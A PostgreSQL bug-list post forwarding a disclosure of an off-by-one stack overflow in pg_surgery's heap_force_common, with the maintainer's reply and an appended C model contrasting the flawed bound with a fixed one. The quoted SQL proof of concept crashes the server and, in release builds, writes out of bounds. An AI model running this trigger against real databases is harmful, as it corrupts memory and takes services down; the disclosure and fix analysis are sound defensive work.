| From: | violin0613(at)tju(dot)edu(dot)cn <violin0613(at)tju(dot)edu(dot)cn> |
|---|---|
| To: | <pgsql-bugs(at)postgresql(dot)org> |
| Subject: | Fw: Re: heap_force_common in contrib/pg_surgery/heap_surgery.c has an off by one stack buffer overflow |
| Date: | 2026-06-03 16:22:53 |
| Message-ID: | 20260604002256.40f1fd544@smtp.qiye.163.com |
| Lists: | pgsql-bugs |
---Original---
From: "Noah Misch"<noah(at)leadboat(dot)com>
Date: Wed, Jun 3, 2026 23:25 PM
To: "王跃林"<violin0613(at)tju(dot)edu(dot)cn>;
Cc: "security"<security(at)postgresql(dot)org>;
Subject: Re: heap_force_common in contrib/pg_surgery/heap_surgery.c has an off by one stack buffer overflow
On Sat, May 23, 2026 at 11:56:59AM +0800, 王跃林 wrote:
> PoC
>
> CREATE EXTENSION IF NOT EXISTS pg_surgery;
>
> CREATE TABLE vuln_005_t();
>
> INSERT INTO vuln_005_t SELECT FROM generate_series(1, 291);
>
> SELECT heap_force_freeze('vuln_005_t'::regclass,
> ARRAY['(0, 291)']::tid[]);
>
> The final statement triggers the bug.
>
> Results
>
> The debug build crashed with:
> TRAP: failed Assert("offno < MaxHeapTuplesPerPage"), File: "heap_surgery.c", Line: 231
> server closed the connection unexpectedly
>
> In a release build, the assertion is removed and the out of bounds
> write remains.
Thanks for the report. The function is superuser-only, so this is not a vuln.
Please report the overflow bug to pgsql-bugs(at)postgresql(dot)org.
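The off-by-one this thread describes, shown as an added C model rather than PostgreSQL's own code: the real heap_surgery.c check, its array and line 231 are not reproduced, and the assumed pieces are a MaxHeapTuplesPerPage of 291 (the 8 kB-block value that matches the '(0, 291)' tid in the PoC) and a per-page scratch array of that size indexed directly by offset number. It contrasts an inclusive bound, which admits the one offset the array cannot hold, with a check derived from the array size, and a write path that fails closed when assertions are compiled out.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Constructed model of the off-by-one described in the report above. This is
 * NOT PostgreSQL's heap_surgery.c: the real check, array and line 231 are not
 * reproduced. Assumptions: MaxHeapTuplesPerPage is 291 (the 8 kB-block value,
 * matching the "(0, 291)" tid in the PoC), and a per-page scratch array of
 * that many entries is indexed directly by the offset number.
 */
#define MAX_HEAP_TUPLES_PER_PAGE 291

typedef uint16_t OffsetNumber;              /* PostgreSQL offsets are 1-based */

typedef struct
{
    uint8_t seen[MAX_HEAP_TUPLES_PER_PAGE]; /* valid indices: 0 .. 290 */
} PageScratch;

/*
 * Inclusive bound: accepts 1 .. 291. Every value it accepts is a legitimate
 * offset number, but 291 is one past the end of seen[] when the offset is
 * used as the index unchanged. This is the shape that overflows.
 */
bool offset_valid_weak(OffsetNumber offno)
{
    return offno >= 1 && offno <= MAX_HEAP_TUPLES_PER_PAGE;
}

/*
 * Bound derived from what the array can hold: accepts 1 .. 290. Whatever
 * indexing convention is chosen, the validation must be written against the
 * array size, not against the abstract range of offset numbers.
 */
bool offset_valid_strict(OffsetNumber offno)
{
    return offno >= 1 && offno < MAX_HEAP_TUPLES_PER_PAGE;
}

/*
 * Write path with the check next to the write. Returns the index written, or
 * -1 when the offset would land outside seen[]; a release build with
 * assertions compiled out therefore fails closed instead of writing past
 * the array.
 */
int mark_seen(PageScratch *ps, OffsetNumber offno)
{
    if (!offset_valid_strict(offno))
        return -1;
    ps->seen[offno] = 1;
    return offno;
}

/*
 * Scan the whole OffsetNumber range and report the gap between the two
 * checks: the one value the weak check accepts and the strict one rejects.
 * Returns -1 if there is no gap and -2 if the gap is wider than one value.
 */
int find_off_by_one(void)
{
    int found = -1;

    for (uint32_t o = 0; o <= UINT16_MAX; o++)
    {
        OffsetNumber offno = (OffsetNumber) o;

        if (offset_valid_weak(offno) && !offset_valid_strict(offno))
        {
            if (found != -1)
                return -2;
            found = (int) o;
        }
    }
    return found;
}

int main(void)
{
    PageScratch ps = {{0}};
    int gap = find_off_by_one();

    printf("weak check accepts %d, strict check rejects it\n", gap);
    printf("mark_seen(%d) -> %d (refused)\n", gap,
           mark_seen(&ps, (OffsetNumber) gap));
    printf("mark_seen(%d) -> %d (written)\n", gap - 1,
           mark_seen(&ps, (OffsetNumber) (gap - 1)));
    return 0;
}
```

The release-build point in the report is what `mark_seen` addresses: an `Assert` is a debugging aid that disappears from release builds, so the guard that keeps an index inside the array has to be an ordinary runtime check that sits beside the write and is derived from the array's real size.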